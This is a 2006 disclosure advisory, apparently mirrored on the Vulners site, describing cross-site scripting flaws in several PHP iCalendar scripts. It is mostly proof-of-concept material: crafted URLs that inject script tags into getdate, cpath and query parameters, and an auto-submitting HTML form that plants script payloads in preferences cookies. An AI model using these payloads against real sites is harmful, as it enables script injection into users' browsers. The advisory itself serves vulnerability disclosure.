Vulners
Lucene search
phpicalendar-xss.txt
`#####################################################
PHP icalendar multiple variable cross site scripting
Vendor url:http://phpicalendar.net/
Advisore:http://lostmon.blogspot.com/2006/12/
php-icalendar-multiple-variable-cross.html
Vendor notify: YES Exploit included:YES
#####################################################
PHP icalendar contains a flaw that allows a remote cross site
scripting attack.This flaw exists because the application does
not validate multiple params upon submission to multiple scripts.
This could allow a user to create a specially crafted URL that
would execute arbitrary code in a user's browser within the
trust relationship between the browser and the server, leading
to a loss of integrity.
######################
versions
######################
all of this versions have been tested
Posible other versions are prone vulnerables.
PHP iCalendar 2.23 rc1
PHP iCalendar 2.22
PHP icalendar 2.0 Beta
PHP iCalendar 1.1
######################
Solution:
######################
No solution was available at this time!!
##################
Time Line
##################
Discovered:20-12-2006
Vendor notify:25-12-2006
Vendor response:
Disclosure:27-12-2006
###################
EXAMPLES & PoC
###################
http://localhost/phpicalendar/day.php?cal=all_calendars_combined971
&getdate=20061225"><script>alert()</script>
http://localhost/phpicalendar/month.php?cal=all_calendars_combined971
&getdate=20061225"><script>alert()</script>
http://localhost/phpicalendar/year.php?cal=all_calendars_combined971
&getdate=20061225"><script>alert()</script>
http://localhost/phpicalendar/week.php?cal=all_calendars_combined971
&getdate=20061225"><script>alert()</script>
http://localhost/phpicalendar/day.php?cpath=%22%3E%3Cscript%3Edocument.write(document.domain)%3C/script%3E
&getdate=20061225&cal%5B%5D=Home&cal%5B%5D=US%2BHolidays&cal%5B%5D=Work
http://localhost/phpicalendar/month.php?cpath=%22%3E%3Cscript%3Edocument.write(document.domain)%3C/script%3E
&getdate=20061225&cal%5B%5D=Home&cal%5B%5D=US%2BHolidays&cal%5B%5D=Work
http://localhost/phpicalendar/year.php?cpath=%22%3E%3Cscript%3Edocument.write(document.domain)%3C/script%3E
&getdate=20061225&cal%5B%5D=Home&cal%5B%5D=US%2BHolidays&cal%5B%5D=Work
http://localhost/phpicalendar/week.php?cpath=%22%3E%3Cscript%3Edocument.write(document.domain)%3C/script%3E
&getdate=20061225&cal%5B%5D=Home&cal%5B%5D=US%2BHolidays&cal%5B%5D=Work
----
http://localhost/phpicalendar/search.php?cpath=&cal=Home%2CUS%2BHolidays%2CWork
&getdate=19700102&query=ss"><script>alert()</script>&submit.x=11&submit.y=15
http://localhost/phpicalendar/search.php?cpath="><script>alert()</script>&cal=Home
%2CUS%2BHolidays%2CWork&getdate=19700102&query=ss&submit.x=11&submit.y=12
http://localhost/phpicalendar/search.php?cpath=&cal=Home%2CUS%2BHolidays%2CWork
&getdate=19700102"><script>alert()</script>&query=ss&submit.x=11&submit.y=12
----
http://localhost/phpicalendar/rss/index.php?cal=Home,US+Holidays,Work
&getdate=20061225"><script>alert()</script>
http://localhost/phpicalendar/print.php?cal=Home,US+Holidays,Work
&getdate=20061225%22%3E%3Cscript%3Ealert()%3C/script%3E&printview=day
################################
Proof of concept for preferences
################################
Multiple param XSS in preferences.php
Use the proof and modify some params
create a evil cookie before submit :)
http://localhost/phpicalendar/preferences.php?cal=Home,US+Holidays,Work
&getdate=20061227%22%3E%3Cscript%3Ealert()%3C/script%3E
<html>
<head></head>
<body>
<title>PHP icalendar XSS in preferences.php PoC</title>
<p><a href="http://phpicalendar.net/" target="_BLANK">PHP
icalendar</a> <= 2.23 rc1 preferences.php XSS Proof Of concept By <a
href="http://Lostmon.blogspot.com" target="_BLANK">Lostmon</a></p>
<p>Modify the target host , by default http://localhost/</P>
<br /><br /><form method='post'
action='http://localhost/phpicalendar/preferences.php?action=setcookie'>
cookie_language: <input input='text' value='Spanish'
name='cookie_language' style='width: 80%' /><br>
cookie_calendar: <input input='text'
value='all_calendars_combined971' name='cookie_calendar' style='width:
80%' /><br>
cpath: <input input='text'
value='<SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>'
name='cpath' style='width: 80%' /><br>
cookie_view: <input input='text' value='day' name='cookie_view'
style='width: 80%' /><br>
cookie_time: <input input='text' value='0700' name='cookie_time'
style='width: 80%' /><br>
cookie_startday: <input input='text' value='Sunday'
name='cookie_startday' style='width: 80%' /><br>
cookie_style: <input input='text' value='default' name='cookie_style'
style='width: 80%' /><br>
unset: <input input='text'
value='<SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>'
name='unset' style='width: 80%' /><br>
set: <input input='text'
value='<SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>'
name='set' style='width: 80%' /><br>
<input type='submit' value='submit' /><br>
</form><hr />
<textarea style='width: 80%; height: 50%;'>
<form method='post'
action='http://localhost/phpicalendar/preferences.php?action=setcookie'>
cookie_language: <input input='text' value='Spanish'
name='cookie_language' style='width: 80%' /><br>
cookie_calendar: <input input='text'
value='all_calendars_combined971' name='cookie_calendar' style='width:
80%' /><br>
cpath: <input input='text'
value='<SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>'
name='cpath' style='width: 80%' /><br>
cookie_view: <input input='text' value='day' name='cookie_view'
style='width: 80%' /><br>
cookie_time: <input input='text' value='0700' name='cookie_time'
style='width: 80%' /><br>
cookie_startday: <input input='text' value='Sunday'
name='cookie_startday' style='width: 80%' /><br>
cookie_style: <input input='text' value='default' name='cookie_style'
style='width: 80%' /><br>
unset: <input input='text'
value='<SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>'
name='unset' style='width: 80%' /><br>
set: <input input='text'
value='<SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>'
name='set' style='width: 80%' /><br>
<input type='submit' value='submit' /><br>
</form>
<script>
document.forms[0].submit()
</script>
</textarea>
</body>
</html>
######################## nd #####################
Thnx to Estrella to be my ligth.
--
atentamente:
Lostmon ([email protected])
Web-Blog: http://lostmon.blogspot.com/
--
La curiosidad es lo que hace mover la mente....
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
28 Dec 2006 00:00Current
7.4High risk
Vulners AI Score7.4